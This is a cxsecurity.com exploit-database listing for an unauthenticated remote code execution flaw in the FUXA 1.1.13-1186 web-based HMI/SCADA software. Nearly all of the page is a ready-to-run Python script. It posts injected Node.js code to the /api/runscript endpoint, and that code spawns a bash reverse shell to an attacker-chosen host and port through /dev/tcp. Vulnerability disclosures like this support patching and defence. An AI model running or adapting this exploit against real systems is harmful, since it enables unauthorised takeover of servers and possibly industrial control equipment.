FUXA 1.1.13-1186 Remote Code Execution

2023.04.21
Credit: Rodolfo Mariano
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: FUXA V.1.1.13-1186- Unauthenticated Remote Code Execution (RCE) # Date: 18/04/2023 # Exploit Author: Rodolfo Mariano # Vendor Homepage: https://github.com/frangoteam/FUXA # Version: FUXA V.1.1.13-1186 (current) from argparse import RawTextHelpFormatter import argparse, sys, threading, requests def main(rhost, rport, lhost, lport): url = "http://"+rhost+":"+rport+"/api/runscript" payload = { "headers": { "normalizedNames":{}, "lazyUpdate": "null" }, "params":{ "script":{ "parameters":[ { "name":"ok", "type":"tagid", "value":"" } ], "mode":"", "id":"", "test":"true", "name":"ok", "outputId":"", "code":"require('child_process').exec('/bin/bash -c \"/bin/sh -i >& /dev/tcp/%s/%s 0>&1\"')" % (lhost,lport) } } } response = requests.post(url, json=payload) args = None parser = argparse.ArgumentParser(formatter_class=RawTextHelpFormatter, usage="python exploit.py --rhosts <ip> --rport <rport>--lport <port>") parser.add_argument('--rhost', dest='rhost', action='store', type=str, help='insert an rhost') parser.add_argument('--rport', dest='rport', action='store', type=str, help='insert an rport', default=1881) parser.add_argument('--lhost', dest='lhost', action='store', type=str, help='insert an lhost') parser.add_argument('--lport', dest='lport', action='store', type=str, help='insert an lport') args=parser.parse_args() main(args.rhost, args.rport, args.lhost, args.lport)


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top